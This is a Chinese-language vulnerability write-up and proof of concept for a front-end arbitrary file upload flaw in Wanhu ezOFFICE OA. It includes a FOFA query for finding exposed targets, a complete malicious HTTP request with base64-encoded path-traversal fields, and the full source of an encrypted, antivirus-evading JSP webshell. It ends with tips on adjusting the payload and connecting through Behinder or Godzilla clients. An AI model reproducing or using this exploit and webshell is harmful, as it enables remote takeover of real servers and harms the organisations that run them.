万户OA文件上传漏洞
漏洞描述
万户oa存在前台任意文件上传漏洞,可导致被getshell
漏洞影响
万户oa
FOFA
"ezoffice"
漏洞复现
漏洞URL:
/defaultroot/officeserverservlet若存在标红返回,即存在漏洞
POC如下:
head部分
POST /defaultroot/officeserverservlet HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 10.10.16.18
Cookie: LocLan=zh_CN; JSESSIONID=7TRdgpNWj1Q480cly1VpQSHyKSPF4ttLQY7mtgd6VWdvWhRq21Ts!-879356732
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1183body部分
DBSTEP V3.0 170 0 949 DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
RECORDID=
isDoc=dHJ1ZQ==
moduleType=Z292ZG9jdW1lbnQ=
FILETYPE=Li4vLi4vOC5qc3A=
1111111111111111111111111111111111111111111111
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
%><%
Cipher c = Cipher.getInstance("AES");
if (session.getValue("u") == null) {
session.putValue("u", "2c627233c52031e4");
}
c.init(2, new SecretKeySpec((session.getValue("u") + "").getBytes(), "AES"));
String con = request.getReader().readLine();
if (con == null)return;
try {
new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(con))).getConstructor(ServletRequest.class,ServletResponse.class).newInstance(request,response);
}catch (Exception e)
{
}
%>以上body第一行部分需要定制修改
949是文件截取长度字符,需要尝试匹配木马长度,也可以直接用POC中定义的免杀冰蝎shell。
其中http 头部:FILETYPE=Li4vLi4vOC5qc3A=
Base64解码为:../../8.jsp是定义的上传路径,可以进行修改,但是修改后也需要对949进行重新赋值匹配,可以不修改。默认木马打入路径是
免杀马需要用魔改的冰蝎进行连接 或者替换哥斯拉马